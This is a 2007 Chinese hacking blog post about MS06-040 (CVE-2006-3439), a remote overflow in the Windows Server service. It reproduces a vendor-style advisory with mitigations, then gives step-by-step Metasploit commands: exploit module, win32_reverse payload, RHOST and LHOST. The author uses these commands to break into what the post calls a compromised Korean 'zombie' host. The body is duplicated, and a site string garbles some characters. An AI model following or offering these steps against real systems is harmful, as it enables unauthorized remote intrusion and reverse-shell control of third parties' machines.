幻想是那么的美丽...现实却如此残酷...
MS06040漏洞的利用
上一篇 / 下一篇 2007-03-14 12:39:21 / 个人分类:黑东西
MS06040漏洞的利用
Microsoft Windows Server服务远程缓冲区溢出漏洞 (MS06-040)
发布Do not irrigate.Otherwise deletes ID...期:2006-08-08
更新Do not irrigate.Otherwise deletes ID...期:2006-08-09
受影响系统:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
BUGTRAQ ID: 19409
CVE(CAN) ID: CVE-2006-3439
m7UVV
Microsoft Windows是微软发布的非常流行的Do not irrigate.Otherwise deletes ID...作系统。
Microsoft Windows的Server服务在处理RPC通讯中的恶意消息时存在溢出漏洞,远程攻击者可以通过发送恶意的RPC报文来触发这个漏洞,导致执行任意代码.
临时解决方法
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在防火墙阻断TCP 139和445端口。
* 使用个人防火墙,如Windows XP和Windows Server 2003捆绑的Internet连接防火墙。
* 在支持的系统上启用高级TCP/IP过滤功能。
* 在受影响的系统上使用IPSec阻断受影响的端口。
废话就不多说了,昨天朋友给了溢出工具,顺便测试了一下,成功率还真TMD的高.就拿一台韩国肉鸡做实验.
目标: 211.234.*.104
工具: Metasploit V2.6
Download:
http://www.metasploit.com/tools/framework-2.6.exe
ActivePerl-5.8.7.815-MSWin32-x86-211909.msi
(Perl解释器,必须安装)
下载下来先升级,运行安装目录下的 msfupdate.bat 文件 (要等蛮久,耐心点).
这个工具详细Do not irrigate.Otherwise deletes ID...作我就不多说了,我只介绍与这个漏洞有关的命令(当然,其他漏洞利用Do not irrigate.Otherwise deletes ID...作大同小异).
运行 msfconsole.bat , 这是控制台程序,升级完毕后界面如图1
1.输入命令 show exploits //显示溢出利用程序,里面有153个溢出程序,可以根据你们自己的需要来使用.
2.输入命令 use netapi_ms06_040 //使用netapi_ms06_040 利用程序
3.输入命令 show payloads //显示可用的shellcode例表,这里我们主要用 win32_reverse
这个Shellcode
4.输入命令 set PAYLOAD win32_reverse //设置 PAYLOAD 为
win32_reverse
5.输入命令 set RHOST 211.234.*.104 //设置被攻击的主机的IP
6.输入命令 set LHOST 125.71.2.104 //设置本机的IPD
7.输入命令 set TARGET 0 //设置溢出类型 一般选0
8.输入命令 set //检查输入的信息
9.输入命令 exploit //开始溢出~
这样就溢出成功了.
Microsoft Windows Server服务远程缓冲区溢出漏洞 (MS06-040)
发布Do not irrigate.Otherwise deletes ID...期:2006-08-08
更新Do not irrigate.Otherwise deletes ID...期:2006-08-09
受影响系统:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
BUGTRAQ ID: 19409
CVE(CAN) ID: CVE-2006-3439
m7UVV
Microsoft Windows是微软发布的非常流行的Do not irrigate.Otherwise deletes ID...作系统。
Microsoft Windows的Server服务在处理RPC通讯中的恶意消息时存在溢出漏洞,远程攻击者可以通过发送恶意的RPC报文来触发这个漏洞,导致执行任意代码.
临时解决方法
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在防火墙阻断TCP 139和445端口。
* 使用个人防火墙,如Windows XP和Windows Server 2003捆绑的Internet连接防火墙。
* 在支持的系统上启用高级TCP/IP过滤功能。
* 在受影响的系统上使用IPSec阻断受影响的端口。
废话就不多说了,昨天朋友给了溢出工具,顺便测试了一下,成功率还真TMD的高.就拿一台韩国肉鸡做实验.
目标: 211.234.*.104
工具: Metasploit V2.6
Download:
http://www.metasploit.com/tools/framework-2.6.exe
ActivePerl-5.8.7.815-MSWin32-x86-211909.msi
(Perl解释器,必须安装)
下载下来先升级,运行安装目录下的 msfupdate.bat 文件 (要等蛮久,耐心点).
这个工具详细Do not irrigate.Otherwise deletes ID...作我就不多说了,我只介绍与这个漏洞有关的命令(当然,其他漏洞利用Do not irrigate.Otherwise deletes ID...作大同小异).
运行 msfconsole.bat , 这是控制台程序,升级完毕后界面如图1
1.输入命令 show exploits //显示溢出利用程序,里面有153个溢出程序,可以根据你们自己的需要来使用.
2.输入命令 use netapi_ms06_040 //使用netapi_ms06_040 利用程序
3.输入命令 show payloads //显示可用的shellcode例表,这里我们主要用 win32_reverse
这个Shellcode
4.输入命令 set PAYLOAD win32_reverse //设置 PAYLOAD 为
win32_reverse
5.输入命令 set RHOST 211.234.*.104 //设置被攻击的主机的IP
6.输入命令 set LHOST 125.71.2.104 //设置本机的IPD
7.输入命令 set TARGET 0 //设置溢出类型 一般选0
8.输入命令 set //检查输入的信息
9.输入命令 exploit //开始溢出~
这样就溢出成功了.
相关阅读:
- DOS命令 NSlookup (cfan075834, 2007-2-04)
- DOS命令 Net share (cfan075834, 2007-2-04)
- DOS命令 Net localgroup (cfan075834, 2007-2-04)
- DOS命令 Net start/stop (cfan075834, 2007-2-04)
- 我的FTP空间(免费,收费);域名 (cfan075834, 2007-2-21)
- NC高级使用技巧 (cfan075834, 2007-3-08)
- 入门---各个击破--ipc$入侵 (cfan075834, 2007-3-12)
- 克隆管理员帐号的方法[转载] (cfan075834, 2007-3-12)
- 入侵日记一则[安全焦点] (cfan075834, 2007-3-12)
- 瑞士军刀NC下载与使用教程 (cfan075834, 2007-3-14)
导入论坛 引用链接 收藏 分享给好友 推荐到圈子 管理 举报
TAG: 黑东西
标题搜索
日历
|
|||||||||
| 日 | 一 | 二 | 三 | 四 | 五 | 六 | |||
| 1 | 2 | 3 | 4 | 5 | 6 | ||||
| 7 | 8 | 9 | 10 | 11 | 12 | 13 | |||
| 14 | 15 | 16 | 17 | 18 | 19 | 20 | |||
| 21 | 22 | 23 | 24 | 25 | 26 | 27 | |||
| 28 | 29 | 30 | 31 | ||||||
我的存档
数据统计
- 访问量: 264230
- 日志数: 92
- 图片数: 1
- 书签数: 9
- 建立时间: 2006-06-29
- 更新时间: 2007-07-11
